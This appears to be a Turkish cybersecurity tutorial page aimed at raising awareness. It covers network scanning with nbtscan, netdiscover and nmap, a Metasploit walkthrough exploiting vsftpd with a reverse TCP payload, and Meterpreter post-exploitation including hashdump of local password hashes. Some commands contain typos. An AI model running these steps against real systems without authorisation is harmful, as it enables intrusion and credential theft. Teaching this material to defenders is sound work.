Site Overlay

Siber Akademi

Siber Akademi sınıfında anlatılan dersler farkındalık oluşturmak amacıyla oluşturulmuştur.

Kötü şekilde kullanılmasından site sahibi sorumlu değildir.

1. HEDEF BELİRLEME

2. YETKİ YÜKSELTME

3. BİLGİ TOPLAMA

Tarama yapma, servis, yazılım ve port keşfi yapma.

4. TARAMA ARAÇLARI

  1. nbtscan

Ağ daki cihazları tararama komutu ( gizli bir tarama ağdaki cihazda çok fazla iz bırakmaz ağı harekete geçirmez)

nbtscan 192.168.8.0/24
  1. netdiscover

Ağdaki tüm IP bloklarını tarıyor ve üretici isimlerinide veriyor örneğin HP cihaz.

netdiscover
  1. nmap

Tüm IP, Port, Program, İşletim sistemi ve zafiyetleri tarar.

nmap --help 					kullanım kılavuzu

nmap 192.168.8.173				Top 1000 port taranır.

nmap 192.168.8.0/24				65535 portun tamamını tarar.

nmap -sV 192.168.8.173				Kullanılan servislerin versiyon bilgilerini verir.

nmap  -p- 192.168.8.173				65535 Portun tümünü tarar.

nmap -sP 192.168.8.0/24 			UP olan IP leri bulma.

nmap -iL myfinallist.txt			TXT içerisinde ki IP Adreslerini taratma

nmap -O 192.168.8.173				İşletim sistemini öğrenme

nmap --script vuln -iL 192.168.8.173		Zafiyet taraması keşfi.

nmap --scritp “http-*”				Sadece HTTP tarama

5. METASPLOIT KULLANMA

Metasploit zafiyet kütüphanesidir.

Terminali açın:

Komutlar ve anlamları

msfconsole			konsolu açar.
search vsftp                    VSTP zafiyetine sızma exploitlerini gösterir.
use 1                           Üsteki komutu basınca hangi exploit kullanılacaksa onun numarası yazılır.
show options			Exploit bizden istediği zorunlu alanları gösterir.
set RHOSTS 192.168.8.173	Exploitin zorunlu olarak istediği ayarları SET etmek için.
exploit				Makineni içine girmek için son komut.


Eğer payload hatası verirse veya payload ihtiyaçı varsa

show payloads			Makine içinde var olan tüm payload listeler
set payload 6			Yeni paylodlar elecek Reverse TCP olanı seçelim.
show options			Neye ihtiyacı varsa o değeri verelim LHOSTS isteyecektir.
set LHOST 192.168.8.190		Kendi IP adresini yaz veya TAB a bas otomatik gelir.
exploit				İçeriye sızma.


LHOST				Saldırı yapacak cihazın IP adresi
RHOST				Saldırı yapılacka cihazın IP adresi
LPORT 				Saldırı için kullanılacak PORT

6. SIZMA SONRASI ÇALIŞTIRILABİLECEK TEMEL KOMUTLAR

id				Bağlandıktan sonra kim olduğunu gösterir
whoami				Bağlandıktan sonra kim olduğunu gösterir

7. PAYLOAD METERPRETER NEDİR

Meterpreter sizma işleminde kullanılan araçlar ve yazılım parcacıklarıdır ve bir payload’dır.

Komutlar:

help
shell
hashdump		Local userların HASH kayıtlarını gösterir.

Arif Akyüz Sistem Network Yöneticisi ve Siber Güvenlik Uzmanı
Arif Akyüz Sistem Network Yöneticisi ve Siber Güvenlik Uzmanı

Arif Akyüz
Bilgi Teknolojileri
Sistem Network Yöneticisi
ve Siber Güvenlik Uzmanı
info@arifakyuz.com

Generic selectors
Exact matches only
Search in title
Search in content
Post Type Selectors